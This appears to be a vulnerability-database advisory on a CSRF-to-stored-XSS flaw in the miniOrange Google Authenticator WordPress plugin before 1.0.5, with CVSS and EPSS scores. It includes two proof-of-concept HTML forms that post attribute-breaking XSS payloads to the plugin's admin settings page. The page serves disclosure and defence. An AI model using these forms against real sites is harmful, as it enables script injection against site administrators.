Lucene search

K
wpexploitNiraj MahajanWPEX-ID:FEFC1411-594D-465B-AEB9-78C141B23762
HistoryJun 06, 2022 - 12:00 a.m.

miniOrange Google Authenticator < 1.0.5 - CSRF to Stored Cross-Site Scripting

2022-06-0600:00:00
Niraj Mahajan
74

4.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.001 Low

EPSS

Percentile

25.9%

The plugin does not have CSRF check when saving its settings, and does not sanitise as well as escape them, allowing attackers to make a logged in admin change them and perform Cross-Site Scripting attacks

v < 1.0.4

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=mo_view_page" method="POST">
      <input type="hidden" name="option" value="mo2f_gauth_appname" />
      <input type="hidden" name="mo2f_gauth_issuer" value='"><img src onerror=alert(/XSS/)>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

v < 1.0.5
<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=mo_view_page" method="POST">
      <input type="hidden" name="option" value="mo2f_gauth_appname" />
      <input type="hidden" name="mo2f_gauth_issuer" value='" style=animation-name:rotation onanimationstart=alert(/XSS/)//' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

4.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.001 Low

EPSS

Percentile

25.9%

Related for WPEX-ID:FEFC1411-594D-465B-AEB9-78C141B23762